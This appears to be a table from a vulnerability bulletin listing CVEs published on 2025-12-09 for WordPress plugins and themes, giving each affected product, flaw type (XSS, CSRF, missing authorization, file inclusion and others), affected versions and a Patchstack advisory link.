| Opal_WP--Fashion | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Opal_WP Fashion fashion2 allows PHP Local File Inclusion. This issue affects Fashion: from n/a through < 5.3.0. | 2025-12-09 | not yet calculated | CVE-2025-67529 | https://vdp.patchstack.com/database/Wordpress/Theme/fashion2/vulnerability/wordpress-fashion-theme-5-3-0-local-file-inclusion-vulnerability?_s_id=cve |
| thembay--Besa | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Besa besa allows PHP Local File Inclusion. This issue affects Besa: from n/a through <= 2.3.15. | 2025-12-09 | not yet calculated | CVE-2025-67530 | https://vdp.patchstack.com/database/Wordpress/Theme/besa/vulnerability/wordpress-besa-theme-2-3-15-local-file-inclusion-vulnerability?_s_id=cve |
| trippleS--Turitor | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in trippleS Turitor turitor allows PHP Local File Inclusion. This issue affects Turitor: from n/a through < 1.5.3. | 2025-12-09 | not yet calculated | CVE-2025-67531 | https://vdp.patchstack.com/database/Wordpress/Theme/turitor/vulnerability/wordpress-turitor-theme-1-5-3-local-file-inclusion-vulnerability?_s_id=cve |
| thembay--Hara | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Hara hara allows PHP Local File Inclusion. This issue affects Hara: from n/a through <= 1.2.17. | 2025-12-09 | not yet calculated | CVE-2025-67532 | https://vdp.patchstack.com/database/Wordpress/Theme/hara/vulnerability/wordpress-hara-theme-1-2-17-local-file-inclusion-vulnerability?_s_id=cve |
| themifyme--Themify Portfolio Post | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themifyme Themify Portfolio Post themify-portfolio-post allows Stored XSS. This issue affects Themify Portfolio Post: from n/a through <= 1.3.0. | 2025-12-09 | not yet calculated | CVE-2025-67533 | https://vdp.patchstack.com/database/Wordpress/Plugin/themify-portfolio-post/vulnerability/wordpress-themify-portfolio-post-plugin-1-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Jacques Malgrange--Rencontre | Cross-Site Request Forgery (CSRF) vulnerability in Jacques Malgrange Rencontre rencontre allows Stored XSS. This issue affects Rencontre: from n/a through <= 3.13.7. | 2025-12-09 | not yet calculated | CVE-2025-67534 | https://vdp.patchstack.com/database/Wordpress/Plugin/rencontre/vulnerability/wordpress-rencontre-plugin-3-13-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| WePlugins - WordPress Development Company--WP Maps | Deserialization of Untrusted Data vulnerability in WePlugins - WordPress Development Company WP Maps wp-google-map-plugin allows Object Injection. This issue affects WP Maps: from n/a through <= 4.8.6. | 2025-12-09 | not yet calculated | CVE-2025-67535 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-google-map-plugin/vulnerability/wordpress-wp-maps-plugin-4-8-6-php-object-injection-vulnerability?_s_id=cve |
| ThimPress--LearnPress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress LearnPress learnpress allows Stored XSS. This issue affects LearnPress: from n/a through <= 4.2.9.4. | 2025-12-09 | not yet calculated | CVE-2025-67536 | https://vdp.patchstack.com/database/Wordpress/Plugin/learnpress/vulnerability/wordpress-learnpress-plugin-4-2-9-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Blair Williams--ThirstyAffiliates | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Blair Williams ThirstyAffiliates thirstyaffiliates allows Stored XSS. This issue affects ThirstyAffiliates: from n/a through <= 3.11.8. | 2025-12-09 | not yet calculated | CVE-2025-67537 | https://vdp.patchstack.com/database/Wordpress/Plugin/thirstyaffiliates/vulnerability/wordpress-thirstyaffiliates-plugin-3-11-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| jegtheme--JNews Gallery | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jegtheme JNews Gallery jnews-gallery allows Stored XSS. This issue affects JNews Gallery: from n/a through < 12.0.1. | 2025-12-09 | not yet calculated | CVE-2025-67538 | https://vdp.patchstack.com/database/Wordpress/Plugin/jnews-gallery/vulnerability/wordpress-jnews-gallery-plugin-12-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Select-Themes--Select Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Select-Themes Select Core select-core allows DOM-Based XSS. This issue affects Select Core: from n/a through < 2.6. | 2025-12-09 | not yet calculated | CVE-2025-67539 | https://vdp.patchstack.com/database/Wordpress/Plugin/select-core/vulnerability/wordpress-select-core-plugin-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Wealcoder--Animation Addons for Elementor | Missing Authorization vulnerability in Wealcoder Animation Addons for Elementor animation-addons-for-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Animation Addons for Elementor: from n/a through <= 2.4.5. | 2025-12-09 | not yet calculated | CVE-2025-67540 | https://vdp.patchstack.com/database/Wordpress/Plugin/animation-addons-for-elementor/vulnerability/wordpress-animation-addons-for-elementor-plugin-2-4-5-arbitrary-content-deletion-vulnerability?_s_id=cve |
| Lester Chan--WP-ShowHide | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Lester Chan WP-ShowHide wp-showhide allows Stored XSS. This issue affects WP-ShowHide: from n/a through <= 1.05. | 2025-12-09 | not yet calculated | CVE-2025-67541 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-showhide/vulnerability/wordpress-wp-showhide-plugin-1-05-cross-site-scripting-xss-vulnerability?_s_id=cve |
| SilkyPress--Multi-Step Checkout for WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SilkyPress Multi-Step Checkout for WooCommerce wp-multi-step-checkout allows DOM-Based XSS. This issue affects Multi-Step Checkout for WooCommerce: from n/a through <= 2.33. | 2025-12-09 | not yet calculated | CVE-2025-67542 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-multi-step-checkout/vulnerability/wordpress-multi-step-checkout-for-woocommerce-plugin-2-33-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Catch Themes--Essential Widgets | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Catch Themes Essential Widgets essential-widgets allows Stored XSS. This issue affects Essential Widgets: from n/a through <= 2.2.2. | 2025-12-09 | not yet calculated | CVE-2025-67543 | https://vdp.patchstack.com/database/Wordpress/Plugin/essential-widgets/vulnerability/wordpress-essential-widgets-plugin-2-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Get Bowtied--Shopkeeper Extender | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Get Bowtied Shopkeeper Extender shopkeeper-extender allows Stored XSS. This issue affects Shopkeeper Extender: from n/a through < 7.0. | 2025-12-09 | not yet calculated | CVE-2025-67544 | https://vdp.patchstack.com/database/Wordpress/Plugin/shopkeeper-extender/vulnerability/wordpress-shopkeeper-extender-plugin-7-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| FirePlugins--FireBox | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FirePlugins FireBox firebox allows Stored XSS. This issue affects FireBox: from n/a through <= 3.1.0-free. | 2025-12-09 | not yet calculated | CVE-2025-67545 | https://vdp.patchstack.com/database/Wordpress/Plugin/firebox/vulnerability/wordpress-firebox-plugin-3-1-0-free-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WP Delicious--WP Delicious | Missing Authorization vulnerability in WP Delicious WP Delicious delicious-recipes allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Delicious: from n/a through <= 1.9.1. | 2025-12-09 | not yet calculated | CVE-2025-67548 | https://vdp.patchstack.com/database/Wordpress/Plugin/delicious-recipes/vulnerability/wordpress-wp-delicious-plugin-1-9-1-broken-access-control-vulnerability?_s_id=cve |
| bobbingwide--oik | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bobbingwide oik oik allows DOM-Based XSS. This issue affects oik: from n/a through <= 4.15.3. | 2025-12-09 | not yet calculated | CVE-2025-67549 | https://vdp.patchstack.com/database/Wordpress/Plugin/oik/vulnerability/wordpress-oik-plugin-4-15-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| rhewlif--Donation Thermometer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in rhewlif Donation Thermometer donation-thermometer allows Stored XSS. This issue affects Donation Thermometer: from n/a through <= 2.2.6. | 2025-12-09 | not yet calculated | CVE-2025-67550 | https://vdp.patchstack.com/database/Wordpress/Plugin/donation-thermometer/vulnerability/wordpress-donation-thermometer-plugin-2-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Wappointment team--Wappointment | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wappointment team Wappointment wappointment allows Stored XSS. This issue affects Wappointment: from n/a through <= 2.6.9. | 2025-12-09 | not yet calculated | CVE-2025-67551 | https://vdp.patchstack.com/database/Wordpress/Plugin/wappointment/vulnerability/wordpress-wappointment-plugin-2-6-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WalkerWP--Walker Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WalkerWP Walker Core walker-core allows DOM-Based XSS. This issue affects Walker Core: from n/a through <= 1.3.17. | 2025-12-09 | not yet calculated | CVE-2025-67552 | https://vdp.patchstack.com/database/Wordpress/Plugin/walker-core/vulnerability/wordpress-walker-core-plugin-1-3-17-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeHigh--Advanced FAQ Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeHigh Advanced FAQ Manager advanced-faq-manager allows DOM-Based XSS. This issue affects Advanced FAQ Manager: from n/a through <= 1.5.2. | 2025-12-09 | not yet calculated | CVE-2025-67553 | https://vdp.patchstack.com/database/Wordpress/Plugin/advanced-faq-manager/vulnerability/wordpress-advanced-faq-manager-plugin-1-5-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Humanityco--Cookie Notice & Compliance for GDPR / CCPA | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Humanityco Cookie Notice & Compliance for GDPR / CCPA cookie-notice allows Stored XSS. This issue affects Cookie Notice & Compliance for GDPR / CCPA: from n/a through <= 2.5.8. | 2025-12-09 | not yet calculated | CVE-2025-67554 | https://vdp.patchstack.com/database/Wordpress/Plugin/cookie-notice/vulnerability/wordpress-cookie-notice-compliance-for-gdpr-ccpa-plugin-2-5-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| useStrict--UseStrict's Calendly Embedder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in useStrict UseStrict's Calendly Embedder cal-embedder-lite allows Stored XSS. This issue affects UseStrict's Calendly Embedder: from n/a through <= 1.1.7.2. | 2025-12-09 | not yet calculated | CVE-2025-67555 | https://vdp.patchstack.com/database/Wordpress/Plugin/cal-embedder-lite/vulnerability/wordpress-usestrict-s-calendly-embedder-plugin-1-1-7-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeHigh--Advanced FAQ Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeHigh Advanced FAQ Manager advanced-faq-manager allows Stored XSS. This issue affects Advanced FAQ Manager: from n/a through <= 1.5.2. | 2025-12-09 | not yet calculated | CVE-2025-67556 | https://vdp.patchstack.com/database/Wordpress/Plugin/advanced-faq-manager/vulnerability/wordpress-advanced-faq-manager-plugin-1-5-2-cross-site-scripting-xss-vulnerability-2?_s_id=cve |
| Rhys Wynne--WP eBay Product Feeds | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rhys Wynne WP eBay Product Feeds ebay-feeds-for-wordpress allows Stored XSS. This issue affects WP eBay Product Feeds: from n/a through <= 3.4.9. | 2025-12-09 | not yet calculated | CVE-2025-67557 | https://vdp.patchstack.com/database/Wordpress/Plugin/ebay-feeds-for-wordpress/vulnerability/wordpress-wp-ebay-product-feeds-plugin-3-4-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Jacques Malgrange--Rencontre | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jacques Malgrange Rencontre rencontre allows Stored XSS. This issue affects Rencontre: from n/a through <= 3.13.7. | 2025-12-09 | not yet calculated | CVE-2025-67558 | https://vdp.patchstack.com/database/Wordpress/Plugin/rencontre/vulnerability/wordpress-rencontre-plugin-3-13-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| vcita--Online Booking & Scheduling Calendar for WordPress by vcita | Missing Authorization vulnerability in vcita Online Booking & Scheduling Calendar for WordPress by vcita meeting-scheduler-by-vcita allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n/a through <= 4.5.5. | 2025-12-09 | not yet calculated | CVE-2025-67559 | https://vdp.patchstack.com/database/Wordpress/Plugin/meeting-scheduler-by-vcita/vulnerability/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-5-5-broken-access-control-vulnerability?_s_id=cve |
| Webilia Inc.--Listdom | Missing Authorization vulnerability in Webilia Inc. Listdom listdom allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Listdom: from n/a through <= 5.0.1. | 2025-12-09 | not yet calculated | CVE-2025-67560 | https://vdp.patchstack.com/database/Wordpress/Plugin/listdom/vulnerability/wordpress-listdom-plugin-5-0-1-broken-access-control-vulnerability?_s_id=cve |
| Oleksandr Lysyi--Debug Log Viewer | Missing Authorization vulnerability in Oleksandr Lysyi Debug Log Viewer debug-log-viewer allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Debug Log Viewer: from n/a through <= 2.0.3. | 2025-12-09 | not yet calculated | CVE-2025-67561 | https://vdp.patchstack.com/database/Wordpress/Plugin/debug-log-viewer/vulnerability/wordpress-debug-log-viewer-plugin-2-0-3-broken-access-control-vulnerability?_s_id=cve |
| WebCodingPlace--Image Caption Hover Pro | Missing Authorization vulnerability in WebCodingPlace Image Caption Hover Pro image-caption-hover-pro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Image Caption Hover Pro: from n/a through < 20.0. | 2025-12-09 | not yet calculated | CVE-2025-67562 | https://vdp.patchstack.com/database/Wordpress/Plugin/image-caption-hover-pro/vulnerability/wordpress-image-caption-hover-pro-plugin-20-0-broken-access-control-vulnerability?_s_id=cve |
| Saad Iqbal--Post SMTP | Missing Authorization vulnerability in Saad Iqbal Post SMTP post-smtp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Post SMTP: from n/a through <= 3.6.1. | 2025-12-09 | not yet calculated | CVE-2025-67563 | https://vdp.patchstack.com/database/Wordpress/Plugin/post-smtp/vulnerability/wordpress-post-smtp-plugin-3-6-1-broken-access-control-vulnerability?_s_id=cve |
| alekv--Pixel Manager for WooCommerce | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in alekv Pixel Manager for WooCommerce woocommerce-google-adwords-conversion-tracking-tag allows Retrieve Embedded Sensitive Data. This issue affects Pixel Manager for WooCommerce: from n/a through <= 1.51.1. | 2025-12-09 | not yet calculated | CVE-2025-67564 | https://vdp.patchstack.com/database/Wordpress/Plugin/woocommerce-google-adwords-conversion-tracking-tag/vulnerability/wordpress-pixel-manager-for-woocommerce-plugin-1-51-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| sizam--Rehub | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in sizam Rehub rehub-theme allows Retrieve Embedded Sensitive Data. This issue affects Rehub: from n/a through <= 19.9.9.1. | 2025-12-09 | not yet calculated | CVE-2025-67565 | https://vdp.patchstack.com/database/Wordpress/Theme/rehub-theme/vulnerability/wordpress-rehub-theme-19-9-9-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| WofficeIO--Woffice Core | Missing Authorization vulnerability in WofficeIO Woffice Core woffice-core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Woffice Core: from n/a through <= 5.4.30. | 2025-12-09 | not yet calculated | CVE-2025-67566 | https://vdp.patchstack.com/database/Wordpress/Plugin/woffice-core/vulnerability/wordpress-woffice-core-plugin-5-4-30-broken-access-control-vulnerability?_s_id=cve |
| uixthemes--Sober | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in uixthemes Sober sober allows Retrieve Embedded Sensitive Data. This issue affects Sober: from n/a through <= 3.5.11. | 2025-12-09 | not yet calculated | CVE-2025-67567 | https://vdp.patchstack.com/database/Wordpress/Theme/sober/vulnerability/wordpress-sober-theme-3-5-11-sensitive-data-exposure-vulnerability?_s_id=cve |
| xtemos--Basel | Missing Authorization vulnerability in xtemos Basel basel allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Basel: from n/a through <= 5.9.1. | 2025-12-09 | not yet calculated | CVE-2025-67568 | https://vdp.patchstack.com/database/Wordpress/Theme/basel/vulnerability/wordpress-basel-theme-5-9-1-broken-access-control-vulnerability?_s_id=cve |
| scriptsbundle--AdForest | Missing Authorization vulnerability in scriptsbundle AdForest adforest allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects AdForest: from n/a through <= 6.0.11. | 2025-12-09 | not yet calculated | CVE-2025-67569 | https://vdp.patchstack.com/database/Wordpress/Theme/adforest/vulnerability/wordpress-adforest-theme-6-0-11-broken-access-control-vulnerability?_s_id=cve |
| GSheetConnector by WesternDeal--WPForms Google Sheet Connector | Missing Authorization vulnerability in GSheetConnector by WesternDeal WPForms Google Sheet Connector gsheetconnector-wpforms allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WPForms Google Sheet Connector: from n/a through <= 4.0.0. | 2025-12-09 | not yet calculated | CVE-2025-67570 | https://vdp.patchstack.com/database/Wordpress/Plugin/gsheetconnector-wpforms/vulnerability/wordpress-wpforms-google-sheet-connector-plugin-4-0-0-broken-access-control-vulnerability?_s_id=cve |
| WPFunnels--WPFunnels | Missing Authorization vulnerability in WPFunnels WPFunnels wpfunnels allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WPFunnels: from n/a through <= 3.6.2. | 2025-12-09 | not yet calculated | CVE-2025-67571 | https://vdp.patchstack.com/database/Wordpress/Plugin/wpfunnels/vulnerability/wordpress-wpfunnels-plugin-3-6-2-broken-access-control-vulnerability?_s_id=cve |
| PenciDesign--PenNews | Missing Authorization vulnerability in PenciDesign PenNews pennews allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PenNews: from n/a through < 6.7.4. | 2025-12-09 | not yet calculated | CVE-2025-67572 | https://vdp.patchstack.com/database/Wordpress/Theme/pennews/vulnerability/wordpress-pennews-theme-6-7-4-broken-access-control-vulnerability?_s_id=cve |
| ThimPress--Sailing | Missing Authorization vulnerability in ThimPress Sailing sailing allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sailing: from n/a through < 4.4.6. | 2025-12-09 | not yet calculated | CVE-2025-67573 | https://vdp.patchstack.com/database/Wordpress/Theme/sailing/vulnerability/wordpress-sailing-theme-4-4-6-broken-access-control-vulnerability?_s_id=cve |
| wpdevart--Booking calendar, Appointment Booking System | Missing Authorization vulnerability in wpdevart Booking calendar, Appointment Booking System booking-calendar allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Booking calendar, Appointment Booking System: from n/a through <= 3.2.30. | 2025-12-09 | not yet calculated | CVE-2025-67574 | https://vdp.patchstack.com/database/Wordpress/Plugin/booking-calendar/vulnerability/wordpress-booking-calendar-appointment-booking-system-plugin-3-2-30-broken-access-control-vulnerability?_s_id=cve |
| Andrew Lima--Sitewide Notice WP | Missing Authorization vulnerability in Andrew Lima Sitewide Notice WP sitewide-notice-wp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sitewide Notice WP: from n/a through <= 2.4.1. | 2025-12-09 | not yet calculated | CVE-2025-67575 | https://vdp.patchstack.com/database/Wordpress/Plugin/sitewide-notice-wp/vulnerability/wordpress-sitewide-notice-wp-plugin-2-4-1-broken-access-control-vulnerability?_s_id=cve |
| QuantumCloud--Simple Link Directory | Missing Authorization vulnerability in QuantumCloud Simple Link Directory simple-link-directory allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Simple Link Directory: from n/a through <= 8.8.3. | 2025-12-09 | not yet calculated | CVE-2025-67576 | https://vdp.patchstack.com/database/Wordpress/Plugin/simple-link-directory/vulnerability/wordpress-simple-link-directory-plugin-8-8-3-broken-access-control-vulnerability?_s_id=cve |
| hassantafreshi--Easy Form Builder | Missing Authorization vulnerability in hassantafreshi Easy Form Builder easy-form-builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Easy Form Builder: from n/a through <= 3.8.20. | 2025-12-09 | not yet calculated | CVE-2025-67577 | https://vdp.patchstack.com/database/Wordpress/Plugin/easy-form-builder/vulnerability/wordpress-easy-form-builder-plugin-3-8-20-broken-access-control-vulnerability?_s_id=cve |
| Rhys Wynne--WP Email Capture | Missing Authorization vulnerability in Rhys Wynne WP Email Capture wp-email-capture allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Email Capture: from n/a through <= 3.12.4. | 2025-12-09 | not yet calculated | CVE-2025-67578 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-email-capture/vulnerability/wordpress-wp-email-capture-plugin-3-12-4-broken-access-control-vulnerability?_s_id=cve |
| vanquish--User Extra Fields | Missing Authorization vulnerability in vanquish User Extra Fields wp-user-extra-fields allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects User Extra Fields: from n/a through <= 16.8. | 2025-12-09 | not yet calculated | CVE-2025-67579 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-user-extra-fields/vulnerability/wordpress-user-extra-fields-plugin-16-8-broken-access-control-vulnerability?_s_id=cve |
| Constant Contact--Constant Contact + WooCommerce | Missing Authorization vulnerability in Constant Contact Constant Contact + WooCommerce constant-contact-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Constant Contact + WooCommerce: from n/a through <= 2.4.1. | 2025-12-09 | not yet calculated | CVE-2025-67580 | https://vdp.patchstack.com/database/Wordpress/Plugin/constant-contact-woocommerce/vulnerability/wordpress-constant-contact-woocommerce-plugin-2-4-1-broken-access-control-vulnerability?_s_id=cve |
| themetechmount--TrueBooker | Missing Authorization vulnerability in themetechmount TrueBooker truebooker-appointment-booking allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects TrueBooker: from n/a through <= 1.1.0. | 2025-12-09 | not yet calculated | CVE-2025-67581 | https://vdp.patchstack.com/database/Wordpress/Plugin/truebooker-appointment-booking/vulnerability/wordpress-truebooker-plugin-1-1-0-broken-access-control-vulnerability?_s_id=cve |
| wbcomdesigns--Wbcom Designs | Missing Authorization vulnerability in wbcomdesigns Wbcom Designs lock-my-bp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Wbcom Designs: from n/a through <= 2.1.1. | 2025-12-09 | not yet calculated | CVE-2025-67582 | https://vdp.patchstack.com/database/Wordpress/Plugin/lock-my-bp/vulnerability/wordpress-wbcom-designs-plugin-2-1-1-broken-access-control-vulnerability?_s_id=cve |
| ThemeAtelier--IDonate | Missing Authorization vulnerability in ThemeAtelier IDonate idonate allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects IDonate: from n/a through <= 2.1.15. | 2025-12-09 | not yet calculated | CVE-2025-67583 | https://vdp.patchstack.com/database/Wordpress/Plugin/idonate/vulnerability/wordpress-idonate-plugin-2-1-15-broken-access-control-vulnerability?_s_id=cve |
| rtCamp--GoDAM | Missing Authorization vulnerability in rtCamp GoDAM godam allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects GoDAM: from n/a through <= 1.4.6. | 2025-12-09 | not yet calculated | CVE-2025-67584 | https://vdp.patchstack.com/database/Wordpress/Plugin/godam/vulnerability/wordpress-godam-plugin-1-4-6-broken-access-control-vulnerability?_s_id=cve |
| flexmls--Flexmls IDX | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in flexmls Flexmls® IDX flexmls-idx allows Phishing. This issue affects Flexmls® IDX: from n/a through <= 3.15.7. | 2025-12-09 | not yet calculated | CVE-2025-67585 | https://vdp.patchstack.com/database/Wordpress/Plugin/flexmls-idx/vulnerability/wordpress-flexmls-idx-plugin-3-15-7-open-redirection-vulnerability?_s_id=cve |
| Ronald Huereca--Highlight and Share | Missing Authorization vulnerability in Ronald Huereca Highlight and Share highlight-and-share allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Highlight and Share: from n/a through <= 5.2.0. | 2025-12-09 | not yet calculated | CVE-2025-67586 | https://vdp.patchstack.com/database/Wordpress/Plugin/highlight-and-share/vulnerability/wordpress-highlight-and-share-plugin-5-2-0-broken-access-control-vulnerability?_s_id=cve |
| CRM Perks--WP Gravity Forms FreshDesk Plugin | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks WP Gravity Forms FreshDesk Plugin gf-freshdesk allows Phishing. This issue affects WP Gravity Forms FreshDesk Plugin: from n/a through <= 1.3.5. | 2025-12-09 | not yet calculated | CVE-2025-67587 | https://vdp.patchstack.com/database/Wordpress/Plugin/gf-freshdesk/vulnerability/wordpress-wp-gravity-forms-freshdesk-plugin-plugin-1-3-5-open-redirection-vulnerability?_s_id=cve |
| Elementor--Elementor Website Builder | Missing Authorization vulnerability in Elementor Elementor Website Builder elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Elementor Website Builder: from n/a through <= 3.33.0. | 2025-12-09 | not yet calculated | CVE-2025-67588 | https://vdp.patchstack.com/database/Wordpress/Plugin/elementor/vulnerability/wordpress-elementor-website-builder-plugin-3-33-0-broken-access-control-vulnerability?_s_id=cve |
| WP Overnight--WooCommerce PDF Invoices & Packing Slips | Missing Authorization vulnerability in WP Overnight WooCommerce PDF Invoices & Packing Slips woocommerce-pdf-invoices-packing-slips allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WooCommerce PDF Invoices & Packing Slips: from n/a through <= 4.9.1. | 2025-12-09 | not yet calculated | CVE-2025-67589 | https://vdp.patchstack.com/database/Wordpress/Plugin/woocommerce-pdf-invoices-packing-slips/vulnerability/wordpress-woocommerce-pdf-invoices-packing-slips-plugin-4-9-1-broken-access-control-vulnerability?_s_id=cve |
| Rustaurius--Ultimate FAQ | Cross-Site Request Forgery (CSRF) vulnerability in Rustaurius Ultimate FAQ ultimate-faqs allows Cross Site Request Forgery. This issue affects Ultimate FAQ: from n/a through <= 2.4.3. | 2025-12-09 | not yet calculated | CVE-2025-67590 | https://vdp.patchstack.com/database/Wordpress/Plugin/ultimate-faqs/vulnerability/wordpress-ultimate-faq-plugin-2-4-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| jegtheme--JNews Paywall | Cross-Site Request Forgery (CSRF) vulnerability in jegtheme JNews Paywall jnews-paywall allows Cross Site Request Forgery. This issue affects JNews Paywall: from n/a through < 12.0.1. | 2025-12-09 | not yet calculated | CVE-2025-67591 | https://vdp.patchstack.com/database/Wordpress/Plugin/jnews-paywall/vulnerability/wordpress-jnews-paywall-plugin-12-0-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Joe Dolson--My Calendar | Missing Authorization vulnerability in Joe Dolson My Calendar my-calendar allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects My Calendar: from n/a through <= 3.6.16. | 2025-12-09 | not yet calculated | CVE-2025-67592 | https://vdp.patchstack.com/database/Wordpress/Plugin/my-calendar/vulnerability/wordpress-my-calendar-plugin-3-6-16-broken-access-control-vulnerability?_s_id=cve |
| Stiofan--UsersWP | Cross-Site Request Forgery (CSRF) vulnerability in Stiofan UsersWP userswp allows Cross Site Request Forgery. This issue affects UsersWP: from n/a through <= 1.2.48. | 2025-12-09 | not yet calculated | CVE-2025-67593 | https://vdp.patchstack.com/database/Wordpress/Plugin/userswp/vulnerability/wordpress-userswp-plugin-1-2-48-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| ThimPress--Thim Elementor Kit | Authorization Bypass Through User-Controlled Key vulnerability in ThimPress Thim Elementor Kit thim-elementor-kit allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Thim Elementor Kit: from n/a through <= 1.3.3. | 2025-12-09 | not yet calculated | CVE-2025-67594 | https://vdp.patchstack.com/database/Wordpress/Plugin/thim-elementor-kit/vulnerability/wordpress-thim-elementor-kit-plugin-1-3-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Ays Pro--Quiz Maker | Cross-Site Request Forgery (CSRF) vulnerability in Ays Pro Quiz Maker quiz-maker allows Cross Site Request Forgery. This issue affects Quiz Maker: from n/a through <= 6.7.0.82. | 2025-12-09 | not yet calculated | CVE-2025-67595 | https://vdp.patchstack.com/database/Wordpress/Plugin/quiz-maker/vulnerability/wordpress-quiz-maker-plugin-6-7-0-82-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Strategy11 Team--Business Directory | Cross-Site Request Forgery (CSRF) vulnerability in Strategy11 Team Business Directory business-directory-plugin allows Cross Site Request Forgery. This issue affects Business Directory: from n/a through <= 6.4.19. | 2025-12-09 | not yet calculated | CVE-2025-67596 | https://vdp.patchstack.com/database/Wordpress/Plugin/business-directory-plugin/vulnerability/wordpress-business-directory-plugin-6-4-19-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
